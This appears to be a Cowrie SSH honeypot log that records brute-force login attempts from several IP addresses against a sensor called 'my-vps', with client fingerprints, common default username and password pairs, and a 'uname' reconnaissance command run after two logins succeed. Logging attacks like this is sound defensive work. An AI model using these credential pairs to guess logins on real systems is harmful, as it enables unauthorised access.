{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:01:01.301896Z","src_ip":"41.226.27.251","session":"7ad90c0599df"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:01:01.321623Z","src_ip":"41.226.27.251","session":"7ad90c0599df"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:01.343926Z","src_ip":"212.227.125.160","session":"801be269525e"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:01:01.482461Z","src_ip":"41.226.27.251","session":"7ad90c0599df"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:02.741247Z","src_ip":"41.226.27.251","session":"7ad90c0599df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41334,"dst_ip":"1.2.3.4","dst_port":22,"session":"0857449bb5a7","protocol":"ssh","message":"New connection: 212.227.235.229:41334 (1.2.3.4:22) [session: 0857449bb5a7]","sensor":"my-vps","timestamp":"2025-08-31T03:01:06.069386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:01:06.070338Z","src_ip":"212.227.235.229","session":"0857449bb5a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:01:06.320972Z","src_ip":"212.227.235.229","session":"0857449bb5a7"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-31T03:01:07.075614Z","src_ip":"212.227.235.229","session":"0857449bb5a7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:08.328898Z","src_ip":"212.227.235.229","session":"0857449bb5a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44424,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc91ff508e63","protocol":"ssh","message":"New connection: 212.227.235.229:44424 (1.2.3.4:22) [session: fc91ff508e63]","sensor":"my-vps","timestamp":"2025-08-31T03:01:10.224984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:01:10.225863Z","src_ip":"212.227.235.229","session":"fc91ff508e63"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:01:10.480827Z","src_ip":"212.227.235.229","session":"fc91ff508e63"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:01:10.945927Z","src_ip":"212.227.235.229","session":"ed3c85738583"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:01:11.246978Z","src_ip":"212.227.235.229","session":"fc91ff508e63"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:01:11.778086Z","src_ip":"212.227.235.229","session":"fc91ff508e63"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:01:11.778924Z","src_ip":"212.227.235.229","session":"fc91ff508e63"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:12.035128Z","src_ip":"212.227.235.229","session":"fc91ff508e63"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:12.036290Z","src_ip":"212.227.235.229","session":"fc91ff508e63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46012,"dst_ip":"1.2.3.4","dst_port":22,"session":"332a7fb99707","protocol":"ssh","message":"New connection: 212.227.235.229:46012 (1.2.3.4:22) [session: 332a7fb99707]","sensor":"my-vps","timestamp":"2025-08-31T03:01:20.183876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:01:21.061997Z","src_ip":"212.227.235.229","session":"332a7fb99707"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:01:21.063850Z","src_ip":"212.227.235.229","session":"332a7fb99707"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50278,"dst_ip":"1.2.3.4","dst_port":22,"session":"7460ec6c8256","protocol":"ssh","message":"New connection: 41.226.27.251:50278 (1.2.3.4:22) [session: 7460ec6c8256]","sensor":"my-vps","timestamp":"2025-08-31T03:01:21.271804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:01:21.273219Z","src_ip":"41.226.27.251","session":"7460ec6c8256"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:01:21.317857Z","src_ip":"41.226.27.251","session":"7460ec6c8256"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:01:21.453887Z","src_ip":"41.226.27.251","session":"7460ec6c8256"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:01:21.567525Z","src_ip":"41.226.27.251","session":"7460ec6c8256"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:01:21.568461Z","src_ip":"41.226.27.251","session":"7460ec6c8256"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:21.615093Z","src_ip":"41.226.27.251","session":"7460ec6c8256"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:21.616172Z","src_ip":"41.226.27.251","session":"7460ec6c8256"}
{"eventid":"cowrie.session.closed","duration":"31.0","message":"Connection lost after 31.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:23.143982Z","src_ip":"212.227.235.229","session":"ed3c85738583"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:01:26.772009Z","src_ip":"212.227.235.229","session":"332a7fb99707"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:28.609870Z","src_ip":"212.227.235.229","session":"332a7fb99707"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50864,"dst_ip":"1.2.3.4","dst_port":22,"session":"81ff22ac2578","protocol":"ssh","message":"New connection: 212.227.125.160:50864 (1.2.3.4:22) [session: 81ff22ac2578]","sensor":"my-vps","timestamp":"2025-08-31T03:01:28.949475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:01:40.114153Z","src_ip":"212.227.125.160","session":"81ff22ac2578"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:01:40.160289Z","src_ip":"212.227.125.160","session":"81ff22ac2578"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":34430,"dst_ip":"1.2.3.4","dst_port":22,"session":"396b9dcec6ee","protocol":"ssh","message":"New connection: 41.226.27.251:34430 (1.2.3.4:22) [session: 396b9dcec6ee]","sensor":"my-vps","timestamp":"2025-08-31T03:01:41.656552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:01:41.657470Z","src_ip":"41.226.27.251","session":"396b9dcec6ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:01:41.701469Z","src_ip":"41.226.27.251","session":"396b9dcec6ee"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:01:41.836209Z","src_ip":"41.226.27.251","session":"396b9dcec6ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36474,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c54b4da7d3d","protocol":"ssh","message":"New connection: 212.227.125.160:36474 (1.2.3.4:22) [session: 0c54b4da7d3d]","sensor":"my-vps","timestamp":"2025-08-31T03:01:42.327942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:01:42.829765Z","src_ip":"212.227.125.160","session":"0c54b4da7d3d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:01:42.830641Z","src_ip":"212.227.125.160","session":"0c54b4da7d3d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:43.006033Z","src_ip":"41.226.27.251","session":"396b9dcec6ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42680,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e315837bb51","protocol":"ssh","message":"New connection: 212.227.235.229:42680 (1.2.3.4:22) [session: 9e315837bb51]","sensor":"my-vps","timestamp":"2025-08-31T03:01:44.134421Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:01:44.890767Z","src_ip":"212.227.125.160","session":"0c54b4da7d3d"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:46.652721Z","src_ip":"212.227.125.160","session":"0c54b4da7d3d"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56478,"dst_ip":"1.2.3.4","dst_port":22,"session":"c444d91d4a53","protocol":"ssh","message":"New connection: 41.226.27.251:56478 (1.2.3.4:22) [session: c444d91d4a53]","sensor":"my-vps","timestamp":"2025-08-31T03:02:01.789608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:02:01.790821Z","src_ip":"41.226.27.251","session":"c444d91d4a53"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:02:01.834100Z","src_ip":"41.226.27.251","session":"c444d91d4a53"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:02:01.966718Z","src_ip":"41.226.27.251","session":"c444d91d4a53"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:02:03.260199Z","src_ip":"41.226.27.251","session":"c444d91d4a53"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:02:06.624987Z","src_ip":"212.227.235.229","session":"9e315837bb51"}
